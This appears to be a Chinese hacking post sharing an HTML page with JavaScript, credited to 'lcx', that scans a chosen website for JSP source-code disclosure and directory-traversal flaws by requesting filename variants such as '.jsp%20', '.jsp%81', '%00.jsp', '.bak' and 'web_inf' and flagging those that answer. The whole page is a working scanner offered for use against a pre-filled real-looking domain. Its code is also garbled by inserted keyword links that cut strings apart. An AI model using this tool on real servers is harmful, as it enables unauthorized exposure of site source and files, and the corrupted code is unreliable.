lcx写的一个暴jsp源码的网页

另存为jsp.htm,在本地即可利用！
<head>
<base target="_blank">
</head>
<style>
BODY {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
BR {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
TD {FONT-FAMILY: "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
a {COLOR: #llccxx; text-decoration: none}
a:hover {color:#llccxx;text-decoration:none}
</style>
<center>
<pre>
海阳顶端网jsp暴源码及目录网页使用帮助:
第一个写域名；第二个写路径；第三个写文件名，注意不要加扩展名:
</pre>
<input type=text id=http size=28 style="border:1px solid #99CCdd; " value="http://www.ctm.net">
<input type=text id=path size=36 style="border:1px solid #99CCdd; " value="/cgi-bin/ctm/<a href='http://www.baidu.com/code/... target=_blank>jsp</a>/cn/NHS/demo/">
<input type=text id=cindex size=6 style="border:1px solid #99CCdd; " value="main">
<input type=button onclick=isExist(http.value) value="检测JSP<a class='Channel_KeyLink' href='http://hi.baidu.com/h4ck3r...源码</a>及目录遍历" style="border:1px solid #99CCdd; ">
<div id="t"></div>
<script>
function isExist(url)
{
var myObject = new Object();
myObject.lcx1 = ".<a href='http://www.baidu.com/code/... target=_blank>jsp</a>.";
myObject.lcx2 = ".<a href='http://www.baidu.comcode/j... target=_blank>jsp</a>+";
myObject.lcx3 = ".<a href='http://www.baidu.com/code/... target=_blank>jsp</a>%20";
myObject.lcx4 = ".<a href='http://www.baidu.com/code/... target=_blank>jsp</a>%2e";
myObject.lcx5 = ".<a href='http://www.baidu.com/code/... target=_blank>jsp</a>%70";
myObject.lcx6 = ".<a href='http://www.baidu.com/code/... target=_blank>jsp</a>%81";
myObject.lcx7 = ".<a href='http://www.baidu.com/code/... target=_blank>jsp</a>%2581";
myObject.lcx8 = ".JSP";
myObject.lcx9 = ".Jsp";
myObject.lcx10 = ".<a href='http://www.baidu.com/code/... target=_blank>jsp</a>.bak";
t.innerHTML+= "<br>目录遍历的方法，暂且收了这么多：<br><br>"
t.innerHTML+= "<a href=" +http.value+path.value+">"+http.value+path.value+"<br>";
t.innerHTML+= "<a href=" +http.value+path.value+"%00.<a href='http://www.baidu.com/code/... target=_blank>jsp</a>>"+http.value+path.value+"%00.<a href='http://www.baidu.com/code/... target=_blank>jsp</a><br>";
t.innerHTML+= "<a href=" +http.value+path.value+"%3f.<a href='http://www.baidu.com/code/... target=_blank>jsp</a>>"+http.value+path.value+"%3f.<a href='http://www.baidu.com/code/... target=_blank>jsp</a><br>";
t.innerHTML+= "<a href=" +http.value+path.value+"?.<a href='http://www.baidu.com/code/... target=_blank>jsp</a>>"+http.value+path.value+"?.<a href='http://www.baidu.com/code/... target=_blank>jsp</a><br>";
t.innerHTML+= "<a href=" +http.value+path.value+"web_inf>"+http.value+path.value+"web_inf/<br><br>";
t.innerHTML+= "估计以下有个链接肯定存在暴<a class='Channel_KeyLink' href='http://www.baidu.com/'...源码</a>或出错<a class='Channel_KeyLink' href='http://www.baidu.com/'... href='http://www.baidu.com/bugs/... target=_blank>漏洞</a></a>，俺可不是瞎说，没有<a class='Channel_KeyLink' href='http://www.baidu.com/'... href='http://www.baidu.com/bugs/... target=_blank>漏洞</a></a>俺不列，下雨阴天闲着也是闲着，挨个点一下看看吧：<br><br>";
for (lcx in myObject)
{
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
xmlhttp.open("GET",http.value+path.value+cindex.value+myObject[lcx],false)
xmlhttp.send()
if(xmlhttp.status==200)
t.innerHTML += "<font color=red><a href="+http.value+path.value+cindex.value+myObject[lcx]+">"+http.value+path.value+cindex.value+myObject[lcx]+"<br></font></a>";
else
t.innerHTML+= http.value+path.value+cindex.value+myObject[lcx]+"你白费心了，俺不存在<a class='Channel_KeyLink' href='http://www.baidu.com/'... href='http://www.baidu.com/bugs/... target=_blank>漏洞</a></a>，不用点<br>";
}
}
</script>
</center>